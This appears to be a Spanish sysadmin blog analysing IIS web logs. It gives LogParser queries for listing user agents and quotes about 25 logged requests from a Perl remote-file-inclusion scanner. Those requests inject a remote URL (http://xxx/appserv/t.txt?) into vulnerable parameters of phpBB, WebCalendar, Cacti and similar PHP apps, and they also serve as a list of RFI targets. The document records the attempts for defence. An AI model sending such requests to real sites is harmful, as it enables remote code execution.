libwww-perl/5.814
May 26, 2009
Entrada que deja la ejecución de un perl en el log:
libwww-perl/5.814
robotgenius+(http://robotgenius.net)
May 26, 2009
La misión de este robot: http://robotgenius.net/company/index.jsp
Motores en cs(User-Agent)
May 26, 2009
Con esta consulta vemos los diferentes cs(User-Agent) que acceden a nuestros log:
logparser “SELECT [cs(User-Agent)], COUNT(*) AS EXPR1 FROM ‘C:\WINDOWS\system32\LogFiles\W3\*’ GROUP BY [cs(User-Agent)] ORDER BY [cs(User-Agent)] desc” -i:IISW3C -o:DATAGRID
Si queremos localizar un User-Agent:
logparser “SELECT * FROM ‘C:\WINDOWS\system32\LogFiles\W3\*’ WHERE cs(User-Agent) like ‘%robotgenius%’” -i:IISW3C -o:DATAGRID
cs(User-Agent) winproxy/1.0+(CP/M;+16-bit) 2
May 26, 2009
WinProxy 1.5.x : User’s Manual : http://www.winproxy.cz/download/WinProxy_EN.pdf
Entrada en el log:
winproxy/1.0+(CP/M;+16-bit) 2
Scanner RFI en Perl
May 26, 2009
Scanner detectado en los logs: http://site.mynet.com/senkofiles/perlrfiscanner.txt
- – [26/May/2009:09:22:15 +0200] “GET /Forums/admin/index.php?phpbb_root_path=http://xxx/appserv/t.txt? HTTP/1.1″ 404 325
- – [26/May/2009:09:22:15 +0200] “GET /forum/impex/ImpExData.php?systempath=http://xxx/appserv/t.txt? HTTP/1.1″ 404 328
- – [26/May/2009:09:22:16 +0200] “GET /impex/ImpExData.php?systempath=http://xxx/appserv/t.txt? HTTP/1.1″ 404 322
- – [26/May/2009:09:22:16 +0200] “GET /forums/impex/ImpExData.php?systempath=http://xxx/appserv/t.txt? HTTP/1.1″ 404 329
- – [26/May/2009:09:22:16 +0200] “GET /webcalendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 339
- – [26/May/2009:09:22:16 +0200] “GET /WebCalendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 339
- – [26/May/2009:09:22:16 +0200] “GET /cacti/include/config_settings.php?config[include_path]=http://xxx/appserv/t.txt? HTTP/1.1″ 404 336
- – [26/May/2009:09:22:17 +0200] “GET /webcalendar/ws/get_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 335
- – [26/May/2009:09:22:17 +0200] “GET /calendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 336
- – [26/May/2009:09:22:17 +0200] “GET /calendar/ws/get_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 332
- – [26/May/2009:09:22:17 +0200] “GET /kalendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 336
- – [26/May/2009:09:22:17 +0200] “GET /webcal/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 334
- – [26/May/2009:09:22:17 +0200] “GET /cal/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 331
- – [26/May/2009:09:22:18 +0200] “GET /appserv/main.php?appserv_root=http://xxx/appserv/t.txt? HTTP/1.1″ 404 319
- – [26/May/2009:09:22:18 +0200] “GET /includes/db_adodb.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 324
- – [26/May/2009:09:22:18 +0200] “GET /includes/session.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 323
- – [26/May/2009:09:22:18 +0200] “GET /modules/projects/gantt.php?dPconfig[root_dir]=http://xxx/appserv/t.txt? HTTP/1.1″ 404 329
- – [26/May/2009:09:22:18 +0200] “GET /modules/projects/gantt2.php?dPconfig[root_dir]=http://xxx/appserv/t.txt? HTTP/1.1″ 404 330
- – [26/May/2009:09:22:19 +0200] “GET /modules/projects/vw_files.php?dPconfig[root_dir]=http://xxx/appserv/t.txt? HTTP/1.1″ 404 332
- – [26/May/2009:09:22:19 +0200] “GET /modules/admin/vw_usr_roles.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 333
- – [26/May/2009:09:22:19 +0200] “GET /modules/public/calendar.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 330
- – [26/May/2009:09:22:19 +0200] “GET /modules/public/date_format.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 333
- – [26/May/2009:09:22:19 +0200] “GET /yabbse/Sources/Packages.php?sourcedir=http://xxx/appserv/t.txt? HTTP/1.1″ 404 330
- – [26/May/2009:09:22:20 +0200] “GET /yappa-ng/src/index_overview.inc.php?config[path_src_include]=http://xxx/appserv/t.txt? HTTP/1.1″ 404 338
- – [26/May/2009:09:22:20 +0200] “GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://xxx/appserv/t.txt? HTTP/1.1″ 404 348
